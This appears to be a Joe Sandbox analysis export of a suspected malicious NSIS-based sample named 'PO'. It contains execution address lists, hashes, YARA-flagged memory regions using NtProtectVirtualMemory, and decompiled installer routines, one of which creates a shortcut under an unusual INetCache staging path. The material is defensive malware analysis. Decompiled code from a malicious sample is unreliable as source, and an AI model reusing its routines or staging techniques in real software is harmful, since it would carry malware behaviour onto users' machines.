0x00000000
0x00407035
0x00406792
0x004067a2
0x004067a5
0x004067a8
0x004067a8
0x004067a8
0x004067ab
0x004067af
0x00000000
0x00000000
0x004067b1
0x004067b7
0x004067e1
0x004067e7
0x004067ee
0x00000000
0x004067ee
0x004067bd
0x004067c0
0x004067c5
0x004067c5
0x004067d0
0x004067d8
0x004067db
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406820
0x00406826
0x00406829
0x00406836
0x0040683e
0x00000000
0x00000000
0x004067f5
0x004067f5
0x004067f9
0x00407044
0x00000000
0x00407044
0x00406805
0x00406810
0x00406810
0x00406810
0x00406813
0x00406816
0x00406819
0x0040681e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406ae5
0x00406ae9
0x00406b07
0x00406b0a
0x00406b11
0x00406b14
0x00406b17
0x00406b1a
0x00406b1d
0x00406b20
0x00406b22
0x00406b29
0x00406b2a
0x00406b2c
0x00406b2f
0x00406b32
0x00406b35
0x00406b35
0x00406b3a
0x00000000
0x00406b3a
0x00406aeb
0x00406aee
0x00406af1
0x00406afb
0x00000000
0x00000000
0x00406b4f
0x00406b53
0x00406b76
0x00406b79
0x00406b7c
0x00406b86
0x00406b55
0x00406b55
0x00406b58
0x00406b5b
0x00406b5e
0x00406b6b
0x00406b6e
0x00406b6e
0x00000000
0x00000000
0x00406b92
0x00406b96
0x00000000
0x00000000
0x00406b9c
0x00406ba0
0x00000000
0x00000000
0x00406ba6
0x00406ba8
0x00406bac
0x00406bac
0x00406baf
0x00406bb3
0x00000000
0x00000000
0x00406c03
0x00406c07
0x00406c0e
0x00406c11
0x00406c14
0x00406c1e
0x00000000
0x00406c1e
0x00406c09
0x00000000
0x00000000
0x00406c2a
0x00406c2e
0x00406c35
0x00406c38
0x00406c3b
0x00406c30
0x00406c30
0x00406c30
0x00406c3e
0x00406c41
0x00406c44
0x00406c44
0x00406c47
0x00406c4a
0x00406c4d
0x00406c4d
0x00406c50
0x00406c57
0x00406c5c
0x00000000
0x00000000
0x00406cea
0x00406cea
0x00406cee
0x0040708c
0x00000000
0x0040708c
0x00406cf4
0x00406cf7
0x00406cfa
0x00406cfe
0x00406d01
0x00406d07
0x00406d09
0x00406d09
0x00406d09
0x00406d0c
0x00406d0f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d6d
0x00406d6d
0x00406d71
0x00407098
0x00000000
0x00407098
0x00406d77
0x00406d7a
0x00406d7d
0x00406d81
0x00406d84
0x00406d8a
0x00406d8c
0x00406d8c
0x00406d8c
0x00406d8f
0x00000000
0x00000000
0x00406b3d
0x00406b3d
0x00406b40
0x00000000
0x00000000
0x00406e7c
0x00406e80
0x00406ea2
0x00406ea5
0x00406eaf
0x00000000
0x00406eaf
0x00406e82
0x00406e85
0x00406e89
0x00406e8c
0x00406e8c
0x00406e8f
0x00000000
0x00000000
0x00406f39
0x00406f3d
0x00406f5b
0x00406f5b
0x00406f5b
0x00406f62
0x00406f69
0x00406f70
0x00406f70
0x00000000
0x00406f70
0x00406f3f
0x00406f42
0x00406f45
0x00406f48
0x00406f4f
0x00406e93
0x00406e93
0x00406e96
0x00000000
0x00000000
0x0040702a
0x0040702d
0x00000000
0x00000000
0x00406c64
0x00406c66
0x00406c6d
0x00406c6e
0x00406c70
0x00406c73
0x00000000
0x00000000
0x00406c7b
0x00406c7e
0x00406c81
0x00406c83
0x00406c85
0x00406c85
0x00406c86
0x00406c89
0x00406c90
0x00406c93
0x00406ca1
0x00000000
0x00000000
0x00406f77
0x00406f77
0x00406f7a
0x00406f81
0x00000000
0x00000000
0x00406f86
0x00406f86
0x00406f8a
0x004070c2
0x00000000
0x004070c2
0x00406f90
0x00406f93
0x00406f96
0x00406f9a
0x00406f9d
0x00406fa3
0x00406fa5
0x00406fa5
0x00406fa5
0x00406fa8
0x00406fab
0x00406fab
0x00406fab
0x00406fab
0x00406fae
0x00406fae
0x00406fb2
0x00407012
0x00407015
0x0040701a
0x0040701b
0x0040701d
0x0040701f
0x00407022
0x00000000
0x00407022
0x00406fb4
0x00406fba
0x00406fbd
0x00406fc0
0x00406fc3
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fcf
0x00406fd2
0x00406fd5
0x00406fee
0x00406ff1
0x00406ff4
0x00406ff7
0x00406ffb
0x00406ffd
0x00406ffd
0x00406ffe
0x00407001
0x00406fd7
0x00406fd7
0x00406fdf
0x00406fe4
0x00406fe6
0x00406fe9
0x00406fe9
0x00407004
0x0040700b
0x00000000
0x0040700d
0x00000000
0x0040700d
0x00000000
0x00406ca9
0x00406cac
0x00406ce2
0x00406e12
0x00406e12
0x00406e12
0x00406e12
0x00406e15
0x00406e15
0x00406e18
0x00406e1a
0x004070a4
0x00000000
0x004070a4
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2d
0x00406e30
0x00406e30
0x00406e30
0x00000000
0x00406e30
0x00406cae
0x00406cb0
0x00406cb2
0x00406cb4
0x00406cb7
0x00406cb8
0x00406cba
0x00406cbc
0x00406cbf
0x00406cc2
0x00406cd8
0x00406cdd
0x00406d15
0x00406d15
0x00406d19
0x00406d45
0x00406d47
0x00406d4e
0x00406d51
0x00406d54
0x00406d54
0x00406d59
0x00406d59
0x00406d5b
0x00406d5e
0x00406d65
0x00406d68
0x00406d95
0x00406d95
0x00406d98
0x00406d9b
0x00406e0f
0x00406e0f
0x00406e0f
0x00000000
0x00406e0f
0x00406d9d
0x00406da3
0x00406da6
0x00406da9
0x00406dac
0x00406daf
0x00406db2
0x00406db5
0x00406db8
0x00406dbb
0x00406dbe
0x00406dd7
0x00406dd9
0x00406ddc
0x00406ddd
0x00406de0
0x00406de2
0x00406de5
0x00406de7
0x00406de9
0x00406dec
0x00406dee
0x00406df1
0x00406df5
0x00406df7
0x00406df7
0x00406df8
0x00406dfb
0x00406dfe
0x00406dc0
0x00406dc0
0x00406dc8
0x00406dcd
0x00406dcf
0x00406dd2
0x00406dd2
0x00406e01
0x00406e08
0x00406d92
0x00406d92
0x00406d92
0x00406d92
0x00000000
0x00406e0a
0x00000000
0x00406e0a
0x00406e08
0x00406d1b
0x00406d1e
0x00406d20
0x00406d23
0x00406d26
0x00406d29
0x00406d2b
0x00406d2e
0x00406d31
0x00406d31
0x00406d34
0x00406d34
0x00406d37
0x00406d3e
0x00406d12
0x00406d12
0x00406d12
0x00406d12
0x00000000
0x00406d40
0x00000000
0x00406d40
0x00406d3e
0x00406cc4
0x00406cc7
0x00406cc9
0x00406ccc
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bb6
0x00406bb6
0x00406bba
0x00407080
0x00000000
0x00407080
0x00406bc0
0x00406bc3
0x00406bc6
0x00406bc9
0x00406bcb
0x00406bcb
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd4
0x00406bd7
0x00406bda
0x00406bdd
0x00406bde
0x00406be0
0x00406be0
0x00406be0
0x00406be3
0x00406be6
0x00406be9
0x00406bec
0x00406bec
0x00406bec
0x00406bef
0x00000000
0x00000000
0x00406e33
0x00406e33
0x00406e33
0x00406e37
0x00000000
0x00000000
0x00406e3d
0x00406e40
0x00406e43
0x00406e46
0x00406e48
0x00406e48
0x00406e48
0x00406e4b
0x00406e4e
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5b
0x00406e5d
0x00406e5d
0x00406e5d
0x00406e60
0x00406e63
0x00406e66
0x00406e69
0x00406e6c
0x00406e70
0x00406e72
0x00406e75
0x00000000
0x00406e77
0x00000000
0x00406e77
0x00406e75
0x004070aa
0x00000000
0x00000000
0x004066d9

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ead38b7015f9474378dd182d16c601773bd961a48b8ca1aefc3332049c463b86
Instruction ID: 84f5b91c3f937eb173619b21672ae23043901769df73ed9f159891f0fc81c8d0
Opcode Fuzzy Hash: ead38b7015f9474378dd182d16c601773bd961a48b8ca1aefc3332049c463b86
Instruction Fuzzy Hash: 72F18671D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7385A8ACF45

Uniqueness

Uniqueness Score: -1.00%

Function 004064C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004064C1(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426778); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2); // executed
				return 0x426778;
			}

0x004064cc
0x004064d5
0x00000000
0x004064e2
0x004064d8
0x00000000

APIs

FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405C83,00425F30,00425F30,00000000,00425F30,00425F30, 47w.7w,?,77372EE0,0040598F,?,77373420,77372EE0), ref: 004064CC
FindClose.KERNELBASE(00000000), ref: 004064D8

Strings

xgB, xrefs: 004064C2

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: xgB
API String ID: 2295610775-399326502
Opcode ID: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
Instruction ID: 909a2899cbbcfc21b24ab628f9350e7a3c7b3772aa6d432f74911df6ac2d0bb5
Opcode Fuzzy Hash: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
Instruction Fuzzy Hash: 8BD0C9315045209BC2111778AE4C85B7A98AF553317628A36B466F12A0C674CC22869C

Uniqueness

Uniqueness Score: -1.00%

Function 00402095 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00402095() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x34)) = E00402BBF(0xfffffff0);
				 *((intOrPtr*)(_t107 - 8)) = E00402BBF(0xffffffdf);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402BBF(2);
				 *((intOrPtr*)(_t107 - 0x3c)) = E00402BBF(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0x10)) = E00402BBF(0x45);
				_t52 =  *(_t107 - 0x1c);
				 *(_t107 - 0x40) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x38) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405BA9( *((intOrPtr*)(_t107 - 8))) == 0) {
					E00402BBF(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56); // executed
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x48);
					 *((intOrPtr*)(_t107 - 0x14)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x14)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 8)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Diakonernes\\Referenceliste\\holdovers");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x38));
						_t91 =  *((intOrPtr*)(_t107 - 0x3c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x40));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 0xc)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0x10)));
						if( *((intOrPtr*)(_t107 - 0x14)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x48));
							 *((intOrPtr*)(_t107 - 0x14)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x34)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x48));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x14)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x0040209e
0x004020a8
0x004020b2
0x004020bc
0x004020c7
0x004020ca
0x004020e4
0x004020e7
0x004020ed
0x004020f0
0x004020fa
0x004020fe
0x004020fe
0x00402103
0x00402114
0x0040211c
0x004021d3
0x004021d3
0x004021da
0x00402122
0x00402122
0x00402131
0x00402135
0x00402138
0x0040213e
0x0040214c
0x0040214f
0x00402151
0x0040215c
0x0040215c
0x00402161
0x00402163
0x0040216a
0x0040216a
0x0040216d
0x00402176
0x00402179
0x0040217f
0x00402181
0x0040218b
0x0040218b
0x0040218e
0x00402197
0x0040219a
0x004021a3
0x004021a9
0x004021ab
0x004021b9
0x004021b9
0x004021bc
0x004021c2
0x004021c2
0x004021c5
0x004021cb
0x004021d1
0x004021e6
0x00000000
0x00000000
0x00000000
0x004021d1
0x004021dc
0x00402a4f
0x00402a5b

APIs

CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Diakonernes\Referenceliste\holdovers, xrefs: 00402154

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Diakonernes\Referenceliste\holdovers
API String ID: 542301482-120621409
Opcode ID: 4186039756558c631eee119f4fdf18c30d8387add4dff58370c0f886253180e0
Instruction ID: a109dbacb2976faa502b9a92b0b1fafcf02ea9b6fb783d383e2774f19d5eba59
Opcode Fuzzy Hash: 4186039756558c631eee119f4fdf18c30d8387add4dff58370c0f886253180e0
Instruction Fuzzy Hash: FA412C75A00209AFCF00DFA4CD88AAD7BB6FF48314B20457AF515EB2D1DBB99A41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 032AB2AB Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

J0I, xrefs: 032AB607

Memory Dump Source

Source File: 00000001.00000002.85191335084.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_32a0000_PO.jbxd

Yara matches

Similarity

API ID:
String ID: J0I
API String ID: 0-74027883
Opcode ID: 392a8b217b950e0dd852075f1713e9fb798aabb7cb00f7c7316f84e966cc6747
Instruction ID: 623a622db3eb250b8a075474ebb2869695e809e0671e6138c55ee077e66d31c5
Opcode Fuzzy Hash: 392a8b217b950e0dd852075f1713e9fb798aabb7cb00f7c7316f84e966cc6747
Instruction Fuzzy Hash: 7B02587560475ACFDB30DE2C88A43DA33B2FF653A0F98412ECC898B644D7718A86CB41

Uniqueness

Uniqueness Score: -1.00%

Function 032C63F1 Relevance: 1.5, APIs: 1, Instructions: 40nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 032C6476

Memory Dump Source

Source File: 00000001.00000002.85191335084.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_32a0000_PO.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: e3e5a86a0827fb0f0e795d8eab044198ff3996e0d59b728316059c5521ecc734
Instruction ID: 6482a1bf98639df02ddf8e776163beb82596a3f545b30061f908239ec938a05f
Opcode Fuzzy Hash: e3e5a86a0827fb0f0e795d8eab044198ff3996e0d59b728316059c5521ecc734
Instruction Fuzzy Hash: 80014F712002869FCB24CE188D597EE77E6AFD5344F55853DEC888B204D7309D46CB06

Uniqueness

Uniqueness Score: -1.00%

Function 032C648B Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.85191335084.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_32a0000_PO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 230f246e5048f32930b87939b0db784e1d6b387d1c68595c811723d881233a93
Instruction ID: 4ac29dd752fc3ccf6851595ab29bdb145b4cf021f55f4d8bcb7fffa07f33ee0b
Opcode Fuzzy Hash: 230f246e5048f32930b87939b0db784e1d6b387d1c68595c811723d881233a93
Instruction Fuzzy Hash: E4B1767465438ADFDB38EF28C8A53DA37B2EF56390FA9412DDD898B140D7328985CB41

Uniqueness

Uniqueness Score: -1.00%

Function 032C3341 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.85191335084.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_32a0000_PO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b6491ff6c4b5d30ca20cb9ce044ed4a63f6773d30a3207df185514ed3eb98cd
Instruction ID: 82751e5e69a416da0fa35631b8392a8e83143d8c2b0f9292879a80be239cc810
Opcode Fuzzy Hash: 5b6491ff6c4b5d30ca20cb9ce044ed4a63f6773d30a3207df185514ed3eb98cd
Instruction Fuzzy Hash: B2819BB461474ADFCB29DF28C8A17D637A2EF46390F88852CDD884F640C7328A86CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00403D6A Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00403D6A(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int _t39;
				signed int _t41;
				struct HWND__* _t51;
				signed int _t69;
				struct HWND__* _t75;
				signed int _t88;
				struct HWND__* _t93;
				signed int _t101;
				int _t105;
				signed int _t117;
				signed int _t118;
				int _t119;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				long _t132;
				int _t134;
				int _t135;
				void* _t136;

				_t117 = _a8;
				if(_t117 == 0x110 || _t117 == 0x408) {
					_t37 = _a12;
					_t127 = _a4;
					__eflags = _t117 - 0x110;
					 *0x423710 = _t37;
					if(_t117 == 0x110) {
						 *0x42a248 = _t127;
						 *0x423724 = GetDlgItem(_t127, 1);
						_t93 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x4216f0 = _t93;
						E00404242(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429228);
						 *0x42920c = E0040140B(4);
						_t37 = 1;
						__eflags = 1;
						 *0x423710 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t135 = 0;
					_t132 = (_t124 << 6) +  *0x42a260;
					__eflags = _t124;
					if(_t124 < 0) {
						L34:
						E0040428E(0x40b);
						while(1) {
							_t39 =  *0x423710;
							 *0x40a39c =  *0x40a39c + _t39;
							_t132 = _t132 + (_t39 << 6);
							_t41 =  *0x40a39c; // 0x0
							__eflags = _t41 -  *0x42a264;
							if(_t41 ==  *0x42a264) {
								E0040140B(1);
							}
							__eflags =  *0x42920c - _t135;
							if( *0x42920c != _t135) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a264; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t118 =  *(_t132 + 0x14);
							E004061A0(_t118, _t127, _t132, 0x43a000,  *((intOrPtr*)(_t132 + 0x24)));
							_push( *((intOrPtr*)(_t132 + 0x20)));
							_push(0xfffffc19);
							E00404242(_t127);
							_push( *((intOrPtr*)(_t132 + 0x1c)));
							_push(0xfffffc1b);
							E00404242(_t127);
							_push( *((intOrPtr*)(_t132 + 0x28)));
							_push(0xfffffc1a);
							E00404242(_t127);
							_t51 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2cc - _t135;
							_v32 = _t51;
							if( *0x42a2cc != _t135) {
								_t118 = _t118 & 0x0000fefd | 0x00000004;
								__eflags = _t118;
							}
							ShowWindow(_t51, _t118 & 0x00000008); // executed
							EnableWindow( *(_t136 + 0x30), _t118 & 0x00000100); // executed
							E00404264(_t118 & 0x00000002);
							_t119 = _t118 & 0x00000004;
							EnableWindow( *0x4216f0, _t119);
							__eflags = _t119 - _t135;
							if(_t119 == _t135) {
								_push(1);
							} else {
								_push(_t135);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t135), 0xf060, ??);
							SendMessageW( *(_t136 + 0x38), 0xf4, _t135, 1);
							__eflags =  *0x42a2cc - _t135;
							if( *0x42a2cc == _t135) {
								_push( *0x423724);
							} else {
								SendMessageW(_t127, 0x401, 2, _t135);
								_push( *0x4216f0);
							}
							E00404277();
							E0040617E(0x423728, 0x429240);
							E004061A0(0x423728, _t127, _t132,  &(0x423728[lstrlenW(0x423728)]),  *((intOrPtr*)(_t132 + 0x18)));
							SetWindowTextW(_t127, 0x423728); // executed
							_push(_t135);
							_t69 = E00401389( *((intOrPtr*)(_t132 + 8)));
							__eflags = _t69;
							if(_t69 != 0) {
								continue;
							} else {
								__eflags =  *_t132 - _t135;
								if( *_t132 == _t135) {
									continue;
								}
								__eflags =  *(_t132 + 4) - 5;
								if( *(_t132 + 4) != 5) {
									DestroyWindow( *0x429218); // executed
									 *0x422700 = _t132;
									__eflags =  *_t132 - _t135;
									if( *_t132 <= _t135) {
										goto L58;
									}
									_t75 = CreateDialogParamW( *0x42a240,  *_t132 +  *0x429220 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t132 + 4) * 4), _t132); // executed
									__eflags = _t75 - _t135;
									 *0x429218 = _t75;
									if(_t75 == _t135) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t132 + 0x2c)));
									_push(6);
									E00404242(_t75);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t136 + 0x10);
									ScreenToClient(_t127, _t136 + 0x10);
									SetWindowPos( *0x429218, _t135,  *(_t136 + 0x20),  *(_t136 + 0x20), _t135, _t135, 0x15);
									_push(_t135);
									E00401389( *((intOrPtr*)(_t132 + 0xc)));
									__eflags =  *0x42920c - _t135;
									if( *0x42920c != _t135) {
										goto L61;
									}
									ShowWindow( *0x429218, 8); // executed
									E0040428E(0x405);
									goto L58;
								}
								__eflags =  *0x42a2cc - _t135;
								if( *0x42a2cc != _t135) {
									goto L61;
								}
								__eflags =  *0x42a2c0 - _t135;
								if( *0x42a2c0 != _t135) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x429218);
						 *0x42a248 = _t135;
						EndDialog(_t127,  *0x421ef8);
						goto L58;
					} else {
						__eflags = _t37 - 1;
						if(_t37 != 1) {
							L33:
							__eflags =  *_t132 - _t135;
							if( *_t132 == _t135) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t88 = E00401389( *((intOrPtr*)(_t132 + 0x10)));
						__eflags = _t88;
						if(_t88 == 0) {
							goto L33;
						}
						SendMessageW( *0x429218, 0x40f, 0, 1);
						__eflags =  *0x42920c;
						return 0 |  *0x42920c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t135 = 0;
					if(_t117 == 0x47) {
						SetWindowPos( *0x423708, _t127, 0, 0, 0, 0, 0x13);
					}
					if(_t117 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x423708,  ~(_a12 - 1) & _t117);
					}
					if(_t117 != 0x40d) {
						__eflags = _t117 - 0x11;
						if(_t117 != 0x11) {
							__eflags = _t117 - 0x111;
							if(_t117 != 0x111) {
								L26:
								return E004042A9(_t117, _a12, _a16);
							}
							_t134 = _a12 & 0x0000ffff;
							_t128 = GetDlgItem(_t127, _t134);
							__eflags = _t128 - _t135;
							if(_t128 == _t135) {
								L13:
								__eflags = _t134 - 1;
								if(_t134 != 1) {
									__eflags = _t134 - 3;
									if(_t134 != 3) {
										_t129 = 2;
										__eflags = _t134 - _t129;
										if(_t134 != _t129) {
											L25:
											SendMessageW( *0x429218, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42a2cc - _t135;
										if( *0x42a2cc == _t135) {
											_t101 = E0040140B(3);
											__eflags = _t101;
											if(_t101 != 0) {
												goto L26;
											}
											 *0x421ef8 = 1;
											L21:
											_push(0x78);
											L22:
											E0040421B();
											goto L26;
										}
										E0040140B(_t129);
										 *0x421ef8 = _t129;
										goto L21;
									}
									__eflags =  *0x40a39c - _t135; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
